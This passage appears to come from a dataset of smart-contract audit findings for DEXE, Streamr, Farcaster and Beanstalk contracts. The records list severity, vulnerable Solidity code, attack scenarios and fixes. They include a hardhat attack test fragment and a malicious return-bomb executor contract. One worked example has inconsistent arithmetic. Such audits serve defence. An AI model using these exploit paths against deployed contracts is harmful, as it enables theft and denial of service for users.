await attackContract.attack2(nft.address, maxPowerPerNft.times(10).toFixed(), 10, 91);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep \"audit attack 2 dramatically lowers ERC721Power totalPower\"`ч```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n 
return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n -`GovPool::delegateTreasury` does not verify transfer of tokens and NFTs to delegatee leading to potential voting manipulationчhighч`GovPool::delegateTreasury` transfers ERC20 tokens & specific nfts from DAO treasury to `govUserKeeper`. Based on this transfer, the `tokenBalance` and `nftBalance` of the delegatee is increased. This allows a delegatee to use this delegated voting power to vote in critical proposals.\\nAs the following snippet of `GovPool::delegateTreasury` function shows, there is no verification that the tokens and nfts are actually transferred to the `govUserKeeper`. 
It is implicitly assumed that a successful transfer is completed and subsequently, the voting power of the delegatee is increased.\\n```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, \"Gov: empty delegation\");\\n require(getExpertStatus(delegatee), \"Gov: delegatee is not an expert\");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n\\nThis could lead to a dangerous situation where a malicious DAO treasury can increase voting power manifold while actually transferring tokens only once (or even, not transfer at all). This breaks the invariance that the total accounting balances in `govUserKeeper` contract must match the actual token balances in that contract.чSince DEXE starts out with a trustless assumption that does not give any special trust privileges to a DAO treasury, it is always prudent to follow the \"trust but verify\" approach when it comes to non-standard tokens, both ERC20 and ERC721. 
To that extent, consider adding verification of token & nft balance increase before/after token transfer.чSince both the ERC20 and ERC721 token implementations are controlled by the DAO, and since we are dealing with upgradeable token contracts, there is a potential rug-pull vector created by the implicit transfer assumption above.ч```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, \"Gov: empty delegation\");\\n require(getExpertStatus(delegatee), \"Gov: delegatee is not an expert\");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n -Voting to change `RewardsInfo::voteRewardsCoefficient` has an unintended side-effect of retrospectively changing voting rewards for active proposalsчmediumч`GovSettings::editSettings` is one of the functions that can be executed via an internal proposal. When this function is called, setting are validated via `GovSettings::_validateProposalSettings`. This function does not check the value of `RewardsInfo::voteRewardsCoefficient` while updating the settings. 
There is neither a floor nor a cap for this setting.\\nHowever, we've noted that this coefficient amplifies voting rewards as calculated in the `GovPoolRewards::_getInitialVotingRewards` shown below.\\n```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n\\nThis has the unintended side-effect that for the same proposal, different voters can get paid different rewards based on when the reward was claimed. In the extreme case where `core.settings.rewardsInfo.voteRewardsCoefficient` is voted to 0, note that we have a situation where voters who claimed rewards before the update got paid as promised whereas voters who claimed later got nothing.чConsider freezing `voteRewardMultiplier` and the time of proposal creation. A prospective update of this setting via internal voting should not change rewards for old proposals.чUpdating `rewardsCoefficient` can lead to unfair reward distribution on old proposals. Since voting rewards for a given proposal are communicated upfront, this could lead to a situation where promised rewards to users are not honoured.\\nProof of Concept: N/Aч```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? 
(core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n -Proposal execution can be DOSed with return bombs when calling untrusted execution contractsчmediumч`GovPool::execute` does not check for return bombs when executing a low-level call. A return bomb is a large bytes array that expands the memory so much that any attempt to execute the transaction will lead to an `out-of-gas` exception.\\nThis can create potentially risky outcomes for the DAO. One possible outcome is "single sided" execution, i.e. "actionsFor" can be executed when voting is successful while "actionsAgainst" can be DOSed when voting fails.\\nA clever proposal creator can design a proposal in such a way that only `actionsFor` can be executed and any attempts to execute `actionsAgainst` will be permanently DOS'ed (refer POC contract).\\nThis is possible because the `GovPoolExecute::execute` does a low level call on potentially untrusted `executor` assigned to a specific action.\\n```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. 
// code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\nчConsider using `ExcessivelySafeCall` while calling untrusted contracts to avoid return bombs.чVoting actions can be manipulated by a creator causing two potential issues:\\nProposal actions can never be executed even after successful voting\\nOne-sided execution where some actions can be executed while others can be DOSed\\nProof of Concept: Consider the following malicious proposal action executor contract. Note that when the proposal passes (isVotesFor = true), the `vote()` function returns empty bytes and when the proposal fails (isVotesFor = false), the same function returns a huge bytes array, effectively causing an \"out-of-gas\" exception to any caller.\\n```\\ncontract MaliciousProposalActionExecutor is IProposalValidator{\\n\\n function validate(IGovPool.ProposalAction[] calldata actions) external view override returns (bool valid){\\n valid = true;\\n }\\n\\n function vote(\\n uint256 proposalId,\\n bool isVoteFor,\\n uint256 voteAmount,\\n uint256[] calldata voteNftIds\\n ) external returns(bytes memory result){\\n\\n if(isVoteFor){\\n // @audit implement actions for successful vote\\n return \"\"; // 0 bytes\\n }\\n else{\\n // @audit implement actions for failed vote\\n\\n // Create a large bytes array\\n assembly{\\n revert(0, 1_000_000)\\n }\\n }\\n\\n }\\n}\\n```\\nч```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. 
// code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n -Use low-level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool status, ) = payable(receiver).call{value: amount}(\"\");\\nrequire(status, \"Gov: failed to send eth\");\\n```\\n\\nIs the same as writing:\\n```\\n(bool status, bytes memory data ) = payable(receiver).call{value: amount}(\"\");\\nrequire(status, \"Gov: failed to send eth\");\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool status;\\nassembly {\\n status := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\n```\\n\\nConsider using ExcessivelySafeCall.чContracts unnecessarily expose themselves to gas griefing attacks.ч```\\n(bool status, ) = payable(receiver).call{value: amount}(\"\");\\nrequire(status, \"Gov: failed to send eth\");\\n```\\n -`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`чlowч`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`.\\nUse `abi.encode()` instead which will pad items to 32 bytes, which will prevent hash collisions (e.g. `abi.encodePacked(0x123,0x456)` => `0x123456` => `abi.encodePacked(0x1,0x23456)`, but `abi.encode(0x123,0x456)` => 0x0...1230...456).\\nUnless there is a compelling reason, `abi.encode` should be preferred. 
If there is only one argument to `abi.encodePacked()` it can often be cast to `bytes()` or `bytes32()` instead. If all arguments are strings and or bytes, `bytes.concat()` should be used instead.\\nProof of Concept:\\n```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n\\n```\\nFile: libs/gov/gov-pool/GovPoolOffchain.sol\\n\\n return keccak256(abi.encodePacked(resultsHash, block.chainid, address(this)));\\n```\\n\\n```\\nFile: user/UserRegistry.sol\\n\\n _signatureHashes[_documentHash][msg.sender] = keccak256(abi.encodePacked(signature));\\n```\\nчSee description.чч```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n -A removal signature might be applied to the wrong `fid`.чmediumчA remove signature is used to remove a key from `fidOwner` using `KeyRegistry.removeFor()`. And the signature is verified in `_verifyRemoveSig()`.\\n```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n\\nBut the signature doesn't specify a `fid` to remove and the below scenario would be possible.\\nAlice is an owner of `fid1` and she created a removal signature to remove a `key` but it's not used yet.\\nFor various reasons, she became an owner of `fid2`.\\n`fid2` has a `key` also but she doesn't want to remove it.\\nBut if anyone calls `removeFor()` with her previous signature, the `key` will be removed from `fid2` unexpectedly.\\nOnce a key is removed, `KeyState` will be changed to `REMOVED` and anyone including the owner can't retrieve it.чThe removal signature should contain `fid` also to be invalidated for another `fid`.чA key remove signature might be used for an unexpected `fid`.ч```\\n function _verifyRemoveSig(address 
fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n -`VoteKickPolicy._endVote()` might revert forever due to underflowчhighчIn `onFlag()`, `targetStakeAtRiskWei[target]` might be less than the total rewards for the flagger/reviewers due to rounding.\\n```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n\\nLet's assume `flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei = 100, StreamrConfig.slashingFraction = 0.03e18(3%), minimumStakeWei() = 1000 * 1e18 / 0.03e18 = 10000 / 3 = 3333.`\\nIf we suppose `stakedWei[target] = streamrConfig.minimumStakeWei()`, then `targetStakeAtRiskWei[target]` = 3333 * 0.03e18 / 1e18 = 99.99 = 99.\\nAs a result, `targetStakeAtRiskWei[target]` is less than total rewards(=100), and `_endVote()` will revert during the reward distribution due to underflow.\\nThe above scenario is possible only when there is a rounding during `minimumStakeWei` calculation. 
So it works properly with the default `slashingFraction = 10%`.чAlways round the `minimumStakeWei()` up.чThe `VoteKickPolicy` wouldn't work as expected and malicious operators won't be kicked forever.ч```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n -Possible overflow in `_payOutFirstInQueue`чhighчIn `_payOutFirstInQueue()`, possible revert during `operatorTokenToDataInverse()`.\\n```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n\\nIf a delegator calls `undelegate()` with `type(uint256).max`, `operatorTokenToDataInverse()` will revert due to uint overflow and the queue logic will be broken forever.\\n```\\n function operatorTokenToDataInverse(uint dataWei) external view returns (uint operatorTokenWei) {\\n return dataWei * this.totalSupply() / valueWithoutEarnings();\\n }\\n```\\nчWe should cap `amountDataWei` before calling `operatorTokenToDataInverse()`.чThe queue logic will be broken forever because `_payOutFirstInQueue()` keeps reverting.ч```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n -Wrong validation in `DefaultUndelegationPolicy.onUndelegate()`чhighчIn `onUndelegate()`, it checks if the operator owner still holds at least `minimumSelfDelegationFraction` of total supply.\\n```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { 
return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), \"error_selfDelegationTooLow\");\\n }\\n```\\n\\nBut `amount` means the DATA token `amount` and `balanceOf(owner)` indicates the `Operator` token balance and it's impossible to compare them directly.ч`onUndelegate()` should compare amounts after converting to the same token.чThe operator owner wouldn't be able to undelegate because `onUndelegate()` works unexpectedly.ч```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), \"error_selfDelegationTooLow\");\\n }\\n```\\n -Malicious target can make `_endVote()` revert forever by forceUnstaking/staking againчhighчIn `_endVote()`, we update `forfeitedStakeWei` or `lockedStakeWei[target]` according to the target's staking status.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked 
or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else {\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n\\nWe consider the target is still active if he has a positive staking amount. But we don't know if he has unstaked and staked again, so the below scenario would be possible.\\nThe target staked 100 amount and a flagger reported him.\\nIn `onFlag()`, `lockedStakeWei[target]` = targetStakeAtRiskWei[target] = 100.\\nDuring the voting period, the target called `forceUnstake()`. Then `lockedStakeWei[target]` was reset to 0 in `Sponsorship._removeOperator()`.\\nAfter that, he stakes again and `_endVote()` will revert forever at L195 due to underflow.\\nAfter all, he won't be flagged again because the current flagging won't be finalized.\\nFurthermore, malicious operators would manipulate the above state by themselves to earn operator rewards without any risks.чPerform stake unlocks in `_endVote()` without relying on the current staking amounts.чMalicious operators can bypass the flagging system by reverting `_endVote()` forever.ч```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function _endVote(address target) internal {\\n address flagger = flaggerAddress[target];\\n bool flaggerIsGone = stakedWei[flagger] == 0;\\n bool targetIsGone = stakedWei[target] == 0;\\n uint reviewerCount = reviewers[target].length;\\n // release stake locks before vote resolution so that slashings and kickings during resolution aren't affected\\n // if either the flagger or the target has forceUnstaked or been kicked, the lockedStakeWei was moved to forfeitedStakeWei\\n if (flaggerIsGone) {\\n forfeitedStakeWei -= flagStakeWei[target];\\n } else 
{\\n lockedStakeWei[flagger] -= flagStakeWei[target];\\n }\\n if (targetIsGone) {\\n forfeitedStakeWei -= targetStakeAtRiskWei[target];\\n } else {\\n lockedStakeWei[target] -= targetStakeAtRiskWei[target]; //@audit revert after forceUnstake() => stake() again\\n }\\n```\\n -In `VoteKickPolicy.onFlag()`, `targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` and `_endVote()` would revert.чmediumч`targetStakeAtRiskWei[target]` might be greater than `stakedWei[target]` in `onFlag()`.\\n```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n\\nFor example,\\nAt the first time, `streamrConfig.minimumStakeWei()` = 100 and an operator(=target) has staked 100.\\n`streamrConfig.minimumStakeWei()` was increased to 2000 after a reconfiguration.\\n`onFlag()` is called for target and `targetStakeAtRiskWei[target]` will be `max(100, 2000) * 10% = 200`.\\nIn `_endVote()`, `slashingWei = _kick(target, slashingWei)` will be 100 because target has staked 100 only.\\nSo it will revert due to underflow during the reward distribution.ч`onFlag()` should check if a target has staked enough funds for rewards and handle separately if not.чOperators with small staked funds wouldn't be kicked forever.ч```\\ntargetStakeAtRiskWei[target] = max(stakedWei[target], streamrConfig.minimumStakeWei()) * streamrConfig.slashingFraction() / 1 ether;\\n```\\n -Possible front running of `flag()`чmediumчThe `target` might call `unstake()/forceUnstake()` before a flagger calls `flag()` to avoid a possible fund loss. 
Also, there would be no slash during the unstaking for `target` when it meets the `penaltyPeriodSeconds` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, \"error_cannotFlagSelf\");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], \"error_cannotFlagAgain\"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), \"error_notEnoughStake\");\\n require(stakedWei[target] > 0, \"error_flagTargetNotStaked\"); //@audit possible front run\\n```\\nчThere is no straightforward mitigation but we could implement a kind of `delayed unstaking` logic for some percent of staking funds.чA malicious target would bypass the kick policy by front running.ч```\\nFile: contracts\\OperatorTokenomics\\SponsorshipPolicies\\VoteKickPolicy.sol\\n function onFlag(address target, address flagger) external {\\n require(flagger != target, \"error_cannotFlagSelf\");\\n require(voteStartTimestamp[target] == 0 && block.timestamp > protectionEndTimestamp[target], \"error_cannotFlagAgain\"); // solhint-disable-line not-rely-on-time\\n require(stakedWei[flagger] >= minimumStakeOf(flagger), \"error_notEnoughStake\");\\n require(stakedWei[target] > 0, \"error_flagTargetNotStaked\"); //@audit possible front run\\n```\\n -In `Operator._transfer()`, `onDelegate()` should be called after updating the token balancesчmediumчIn `_transfer()`, `onDelegate()` is called to validate the owner's `minimumSelfDelegationFraction` requirement.\\n```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this \"delegation\"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); 
//@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n\\nBut `onDelegate()` is called before updating the token balances and the below scenario would be possible.\\nThe operator owner has 100 shares(required minimum fraction). And there are no undelegation policies.\\nLogically, the owner shouldn't be able to transfer his 100 shares to a new delegator due to the min fraction requirement in `onDelegate()`.\\nBut if the owner calls `transfer(owner, to, 100)`, `balanceOf(owner)` will be 100 in `onDelegation()` and it will pass the requirement because it's called before `super._transfer()`.ч`onDelegate()` should be called after `super._transfer()`.чThe operator owner might transfer his shares to other delegators in anticipation of slashing, to avoid slashing.ч```\\nFile: contracts\\OperatorTokenomics\\Operator.sol\\n // transfer creates a new delegator: check if the delegation policy allows this \"delegation\"\\n if (balanceOf(to) == 0) {\\n if (address(delegationPolicy) != address(0)) {\\n moduleCall(address(delegationPolicy), abi.encodeWithSelector(delegationPolicy.onDelegate.selector, to)); //@audit\\nshould be called after _transfer()\\n }\\n }\\n super._transfer(from, to, amount);\\n```\\n -`onTokenTransfer` does not validate if the call is from the DATA token contractчmediumч`SponsorshipFactory::onTokenTransfer` and `OperatorFactory::onTokenTransfer` are used to handle the token transfer and contract deployment in a single transaction. But there is no validation that the call is from the DATA token contract and anyone can call these functions.\\nThe impact is low for `Sponsorship` deployment, but for `Operator` deployment, `ClonesUpgradeable.cloneDeterministic` is used with a salt based on the operator token name and the operator address. 
An attacker can abuse this to cause DoS for deployment.\\nWe see that this validation is implemented correctly in other contracts like `Operator`.\\n```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\nчAdd a validation to ensure the caller is the actual DATA contract.чAttackers can prevent the deployment of `Operator` contracts.ч```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n -Insufficient validation of new Fertilizer IDs allows for a denial-of-service (DoS) attack on `SeasonFacet::gm` when above peg, once the last element in the FIFO is paidчmediumчA Fertilizer NFT can be interpreted as a bond without an expiration date which is to be repaid in Beans and includes interest (Humidity). This bond is placed in a FIFO list and intended to recapitalize the $77 million in liquidity stolen during the April 2022 exploit. One Fertilizer can be purchased for 1 USD worth of WETH: prior to BIP-38, this purchase was made using USDC.\\nEach fertilizer is identified by an Id that depends on `s.bpf`, indicating the cumulative amount of Beans paid per Fertilizer. This value increases each time `Sun::rewardToFertilizer` is called, invoked by `SeasonFacet::gm` if the Bean price is above peg. Therefore, Fertilizer IDs depend on `s.bpf` at the moment of minting, in addition to the amount of Beans to be paid.\\nThe FIFO list has the following components:\\ns.fFirst: Fertilizer Id corresponding to the next Fertilizer to be paid.\\ns.fLast: The highest active Fertilizer Id which is the last Fertilizer to be paid.\\ns.nextFid: Mapping from Fertilizer Id to Fertilizer id, indicating the next element of a linked list. If an Id points to 0, then there is no next element.\\nMethods related to this FIFO list include: LibFertilizer::push: Add an element to the FIFO list. 
LibFertilizer::setNext: Given a fertilizer id, add a pointer to next element in the list LibFertilizer::getNext: Get next element in the list.\\nThe intended behaviour of this list is to add a new element to its end whenever a new fertilizer is minted with a new Id. Intermediate addition to the list was formerly allowed only by the Beanstalk DAO, but this functionality has since been deprecated in the current upgrade with the removal of `FertilizerFacet::addFertilizerOwner`.\\nConsequences of replacing BEAN:3CRV MetaPool with the BEAN:ETH Well: Before this upgrade, addition of 0 Fertilizer through `LibFertilizer::addFertilizer` was impossible due to the dependency on Curve in LibFertilizer::addUnderlying:\\n```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n\\nHowever, with the change of dependency involved in the Wells integration, this restriction no longer holds:\\n```\\n function addUnderlying(uint256 usdAmount, uint256 minAmountOut) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // Calculate how many new Deposited Beans will be minted\\n uint256 percentToFill = usdAmount.mul(C.precision()).div(\\n remainingRecapitalization()\\n 
);\\n uint256 newDepositedBeans;\\n if (C.unripeBean().totalSupply() > s.u[C.UNRIPE_BEAN].balanceOfUnderlying) {\\n newDepositedBeans = (C.unripeBean().totalSupply()).sub(\\n s.u[C.UNRIPE_BEAN].balanceOfUnderlying\\n );\\n newDepositedBeans = newDepositedBeans.mul(percentToFill).div(\\n C.precision()\\n );\\n }\\n\\n // Calculate how many Beans to add as LP\\n uint256 newDepositedLPBeans = usdAmount.mul(C.exploitAddLPRatio()).div(\\n DECIMALS\\n );\\n\\n // Mint the Deposited Beans to Beanstalk.\\n C.bean().mint(\\n address(this),\\n newDepositedBeans\\n );\\n\\n // Mint the LP Beans to the Well to sync.\\n C.bean().mint(\\n address(C.BEAN_ETH_WELL),\\n newDepositedLPBeans\\n );\\n\\n // @audit If nothing was previously deposited this function returns 0, IT DOES NOT REVERT\\n uint256 newLP = IWell(C.BEAN_ETH_WELL).sync(\\n address(this),\\n minAmountOut\\n );\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(usdAmount);\\n }\\n```\\n\\nGiven that the new integration does not revert when attempting to add 0 Fertilizer, it is now possible to add a self-referential node to the end FIFO list, but only if this is the first Fertilizer NFT to be minted for the current season by twice calling `FertilizerFacet.mintFertilizer(0, 0, 0, mode)`. 
